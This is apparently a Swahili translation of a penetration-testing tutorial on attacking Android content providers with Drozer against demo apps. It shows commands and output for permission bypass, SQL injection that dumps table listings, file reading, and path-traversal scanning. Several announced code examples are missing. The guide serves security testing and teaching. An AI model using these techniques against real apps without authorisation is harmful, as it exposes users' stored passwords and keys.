Data inatolewa kutoka kwenye programu moja kwenda nyingine kwa ombi kupitia kipengele kinachoitwa mtoa huduma wa yaliyomo. Maombi haya yanasimamiwa kupitia njia za darasa la ContentResolver. Watoa huduma wa yaliyomo wanaweza kuhifadhi data zao katika maeneo mbalimbali, kama vile database, faili, au kupitia mtandao.
Katika faili ya Manifest.xml, tangazo la mtoa huduma wa yaliyomo linahitajika. Kwa mfano:
Kupata upatikanaji wa content://com.mwr.example.sieve.DBContentProvider/Keys, idhini ya READ_KEYS ni muhimu. Ni ya kuvutia kufahamu kuwa njia /Keys/ inaweza kufikiwa katika sehemu ifuatayo, ambayo haiko salama kutokana na kosa la mwandishi wa programu, ambaye alilinda /Keys lakini alitangaza /Keys/.
Labda unaweza kupata data binafsi au kutumia udhaifu fulani (SQL Injection au Path Traversal).
Pata habari kutoka kwa watoa huduma za yaliyomo yaliyofichuliwa
dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Authority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority: com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Inawezekana kuunganisha jinsi ya kufikia DBContentProvider kwa kuanza URIs na "content://". Mbinu hii inategemea ufahamu uliopatikana kwa kutumia Drozer, ambapo habari muhimu ilipatikana katika saraka ya /Keys.
Drozer inaweza kudhani na kujaribu URIs kadhaa:
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Unapaswa pia kuangalia msimbo wa ContentProvider kutafuta maswali:
Pia, ikiwa huwezi kupata maswali kamili unaweza kuangalia majina yaliyotangazwa na ContentProvider kwenye mbinu ya onCreate:
Watoa Huduma wa Yaliyomo Yaliyowekwa kwenye Database
Labda watoa huduma wengi wa Yaliyomo hutumiwa kama kiolesura kwa database. Kwa hivyo, ikiwa unaweza kufikia hiyo unaweza kuwa na uwezo wa kutoa, kusasisha, kuingiza na kufuta habari.
Angalia ikiwa unaweza kufikia habari nyeti au jaribu kubadilisha ili kipuuze mifumo ya idhini.
Unapochunguza msimbo wa Mtoaji wa Yaliyomo angalia pia kwa kazi zilizo na majina kama: swali, ingiza, sasisha na futa:
Kwa kuuliza database utajifunza jina la safuwima, kisha, unaweza kuweza kuweka data katika DB:
Note kwamba katika kuweka na kuboresha unaweza kutumia --string kuashiria string, --double kuashiria double, --float, --integer, --long, --short, --boolean
Boresha yaliyomo
Ukiwa unajua majina ya safuwima unaweza pia kurekebisha viingilio:
Futa yaliyomo
SQL Injection
Ni rahisi kujaribu kwa SQL injection (SQLite) kwa kubadilisha projection na fields za uteuzi ambazo zinapitishwa kwa mtoa yaliyomo.
Unapouliza Mtoa Yaliyomo kuna hoja 2 za kuvutia za kutafuta habari: --selection na --projection:
Unaweza kujaribu kutumia vibaya hizi paramita kujaribu kwa SQL injections:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "*
FROM SQLITE_MASTER WHERE type='table';--"
| type | name | tbl_name | rootpage | sql |
| table | android_metadata | android_metadata | 3 | CREATE TABLE ... |
| table | Passwords | Passwords | 4 | CREATE TABLE ... |
Kugundua SQLInjection kiotomatiki na Drozer
dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run scanner.provider.sqltables -a jakhar.aseem.diva
Scanning jakhar.aseem.diva...
Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/:
android_metadata
notes
sqlite_sequence
Watoa Huduma wa Yaliyomo Yaliyoungwa kwa Mfumo wa Faili
Watoa huduma wa yaliyomo wanaweza kutumika pia kwa kupata faili:
Soma faili
Unaweza kusoma faili kutoka kwa Mtoa Huduma wa Yaliyomo
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
Ufuatiliaji wa Njia
Ikiwa unaweza kupata faili, unaweza kujaribu kutumia Ufuatiliaji wa Njia (katika kesi hii haitakiwi lakini unaweza kujaribu kutumia "../" na mbinu kama hizo).
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
Kugundua Ufikiaji wa Njia kiotomatiki na Drozer
dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider
